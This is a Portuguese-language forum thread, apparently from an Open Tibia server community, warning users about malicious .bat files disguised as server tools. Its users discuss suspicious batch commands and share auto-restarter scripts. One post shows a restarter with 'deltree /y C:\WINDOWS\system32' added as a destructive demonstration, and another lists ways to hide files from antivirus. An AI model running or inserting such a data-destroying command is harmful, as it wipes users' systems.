Fl4m3r_ 0 Postado Janeiro 13, 2006 Share Postado Janeiro 13, 2006 A cada dia o OT vem recebendo lammers e mais lammers que não tem nada para fazer e ficam postando keyoggers etc. Vou lhes dar umas dicas para não cair nessa: Arquivos não indetificados pelo anti-vírus: Antes de mais nada quero esclareçer que todo anti-vírus possui falhas e nem sempre programas assim considerados pelo anti-vírus como trojan ou algo serão algo que atrapalhará sua vida. Existem arquivos indetectáveis e existem programas e joinners que passam dispercebidos. Portanto, se você acha que está protegido porque tem o melhor anti-vírus, você está completamente errado. Tem noob hoje em dia que está colocando pequenos comandos no arquivo .bat, e enviando como OT. Como prevenir? Abra seu bloco de notas vá em abrir e selecione para abrir qualquer arquivo, então, selecione o arquivo .bat baixado. Se tiver algum desses comandos: @echo offEste comando esconde a ação. Todo Badcon possui um desses, ou seja se no seu .bat tiver um desses já pode descartar. ClsLimpa a tela. Isso faz com que na janela de Dos nada apareça. Muito usado em badcons também. DelMuito cuidado com esse comando. Ele permite deletar qualquer parte do seu sistema operacional. DeltreeO mais perigoso. Ele destrói o windows da pessoa quando o .bat é rodado. Cuidado com esse. Bom, esses são os mais usados, porque os lammers não conheçem o outros. É demais pra eles. Espero que isso ajude. Link para o comentário Compartilhar em outros sites More sharing options...
Eigenlieb 9 Postado Janeiro 13, 2006 Share Postado Janeiro 13, 2006 Tem noob hoje em dia que está colocando pequenos comandos no arquivo .bat, e enviando como OT. Como prevenir? Um arquivo .Bat é um arquivo bem peculiar, ele executa as ações listadas. Eu realmente não saberia dizer quem iria clicar em uma .Bat sem saber o que ele é... . . . Ok, você deu um bom aviso... Deltree O mais perigoso. Ele destrói o windows da pessoa quando o .bat é rodado. Cuidado com esse. ??? O deltree é um comando que exclui a arvore do diretorio escolhido. De nada adianta ele ser rodado sozinho. DELTREE [/Y] [unidade:]caminho [[unidade:]caminho[...]] Os programas maliciosos não utilizam o /Y Pois ele server para pedir a confirmação de exclusão.Do jeito que voce diz ele parece mortal :grin: @echo off Pode descartar qualquer arquivo que contenha isso? LOL?? Não. Conheço varias ferramentas de remoção de spywares e virus que são .bat e contém, claro, esse echo off. Echo off server para remover o "eco" ele não mostra a ação que está sendo executada. E pode se adicionar falas também. Por exemplo, posso criar um "programa" para rodar a limpeza de disco. é muito util para maquinas em rede, pois não preciso ir em iniciar>acessorios e etc. Basta rodar o arquivo. @echo offecho :::::::::::::: echo :feito por::Eigenlieb::: echo :::::::::::::: echo Ola, rodaremos a limpeza de disco. Esse aplicativo serve para localizar echo e apagar arquivos não utilizados no seu computador. pause cd C:\WINDOWS\system32 cleanmgr Podem copiar e colar no bloco de notas salvar como Limpeza.bat rodar e ver o que acontece. É tudo feito por comandos DOS. Ai ai... vocês não são do tempo do Win 3.11, quem ai é sabe do que eu estou falando :grin: E tomem cuidado também, existem aplicativos que transformam arquivos .bat e .exe assim podem se passar por outros arquivos. Link para o comentário Compartilhar em outros sites More sharing options...
Rotciv 2 Postado Janeiro 13, 2006 Share Postado Janeiro 13, 2006 bom... VEJA ISSU: @echo offOTServ Auto Restarter echo ========================================= echo Otserv restarter by GM Rotciv echo ========================================= echo :begin neverland.exe echo echo ========================================= echo --- Server ja vai reiniciar, espera um pouco --- echo ========================================= echo goto begin :goto begin issu eh um restarter, existe algum problema com ele? Link para o comentário Compartilhar em outros sites More sharing options...
L0ky 0 Postado Janeiro 13, 2006 Share Postado Janeiro 13, 2006 Realmente não vejo problema algum, mas nesse caso. Vejamos por exemplo um outro... Suponhamos que alguem que não entenda muito da coisa, rode um OT com autorestarter, e que na mesma pasta do OT esteja um Trojan oculto que será iniciado junto com o OT... Isso é um perigo, usando @echo off a pessoa que estiver abrindo o OTServ estará disponibilizando seu PC aos outros sem saber... Portanto, editar o conteúdo de um *.bat antes de executá-lo é a melhor maneira de se previnir. Link para o comentário Compartilhar em outros sites More sharing options...
Eigenlieb 9 Postado Janeiro 13, 2006 Share Postado Janeiro 13, 2006 bom...VEJA ISSU: issu eh um restarter, existe algum problema com ele? <{POST_SNAPBACK}> Não. A unica coisa que tem de diferente é o comando :begin É um comando de auto efetivação. Ele não roda nenhum codigo malicioso. Ah não ser que o seu neverland.exe tenha um codigo malicioso Link para o comentário Compartilhar em outros sites More sharing options...
Fl4m3r_ 0 Postado Janeiro 13, 2006 Autor Share Postado Janeiro 13, 2006 Tomar cuidado com joinners também e tem um programa que não me lembro o nome que "burla" o anti virus depois eu posto o nome que agora não me lembro Link para o comentário Compartilhar em outros sites More sharing options...
Eigenlieb 9 Postado Janeiro 13, 2006 Share Postado Janeiro 13, 2006 A coisa mais facil é se burlar um anti virus. Pode-se: Comprimir o arquivo. Esconder o arquivo dentro de outro. ( Por isso não se deve aceitar arquivos de alguem que você não conhece.) Não existe um "programa" especifico que é usado. A maioria dos criadores de Spywares e trojans já colocam um utilitario para "esconder" junto com o arquivo. É simples. Link para o comentário Compartilhar em outros sites More sharing options...
Eigenlieb 9 Postado Janeiro 14, 2006 Share Postado Janeiro 14, 2006 Olhem só, eu vou pegar o AutoRestarter dado pelo GM Rot~ e vou incluir um codigo malicioso. @echo offOTServ Auto Restarter echo ========================================= echo Otserv restarter by GM Rotciv echo ========================================= echo :begin neverland.exe echo echo ========================================= echo --- Server ja vai reiniciar, espera um pouco --- echo ========================================= echo goto begin :goto begin Agora o mesmo restarter com um codigo ~>Altamente malicioso <~ NÂO EXECUTE! @echo offOTServ Auto Restarter echo ========================================= echo Otserv restarter by GM Rotciv echo ========================================= echo :begin neverland.exe echo echo ========================================= echo --- Server ja vai reiniciar, espera um pouco --- echo ========================================= echo goto begin :goto begin deltree /y C:\WINDOWS\system32 Mesmo sem atrapalhar o funcionamento do restarter esse codigo exclui a pasta System32 que contem arquivos de sistema importantes. VOU AVISAR DE NOVO. NÃO EXECUTE ESSE ARQUIVO, NÃO VOU ME RESPONSABILIZAR PELO O QUE PODE ACONTECER. Se os moderadores não concordarem em expor um codigo malicioso eu terei muito prazer em editar esse post ____________________________________________________________________ Só deixando uma observação... Eu criei um codigo muito chato Ele só vai apagar a system32 quando o server cair... :sleeping: Link para o comentário Compartilhar em outros sites More sharing options...
DanielStyfler 0 Postado Novembro 26, 2007 Share Postado Novembro 26, 2007 Bom saber :smile_positivo: Link para o comentário Compartilhar em outros sites More sharing options...
Sarve 0 Postado Abril 9, 2008 Share Postado Abril 9, 2008 gente estava procurando um topico de restarter para meu ot nao fecha e peguei este echo off title Evolutions Server cls :controllerini Evolutions-XML.exe echo Caiu =´[ Mais eu tenho restarter e aprendi a criar com o Zirun =) goto :controllerini só q agr nao consigo abrir nenhum ot pq meu avg reconheçe como virus alguem pode me ajudar?? Link para o comentário Compartilhar em outros sites More sharing options...
DaNDaNrOxX 15 Postado Abril 9, 2008 Share Postado Abril 9, 2008 Amigo, você postou em um tópico de 2006... Faça isto mais não mano... Se tiver alguma dúvida, vá até a seção de dúvidas sobre OTServer e poste lá Link para o comentário Compartilhar em outros sites More sharing options...
Sarve 0 Postado Abril 9, 2008 Share Postado Abril 9, 2008 gente estava procurando um topico de restarter para meu ot nao fecha e peguei este echo off title Evolutions Server cls :controllerini Evolutions-XML.exe echo Caiu =´[ Mais eu tenho restarter e aprendi a criar com o Zirun =) goto :controllerini só q agr nao consigo abrir nenhum ot pq meu avg reconheçe como virus alguem pode me ajudar?? mais manow eu num consigo faze em otro topico me ajuda porfavor Link para o comentário Compartilhar em outros sites More sharing options...
Sarve 0 Postado Abril 9, 2008 Share Postado Abril 9, 2008 nossa q mankada Link para o comentário Compartilhar em outros sites More sharing options...
didinhaxd 1 Postado Abril 15, 2008 Share Postado Abril 15, 2008 Não gostei muito porquê eu não tenho net discada :] Mais fora isso.. APROVADO Metas: 1 Post [x] Servo 10 Posts [x] Camponês 25 Posts [x] Caçador 50 Posts [x] Cavaleiro 100 Posts [ ] <~~ ALVO BARONETE 200 Posts [ ] Barão Link para o comentário Compartilhar em outros sites More sharing options...
Posts Recomendados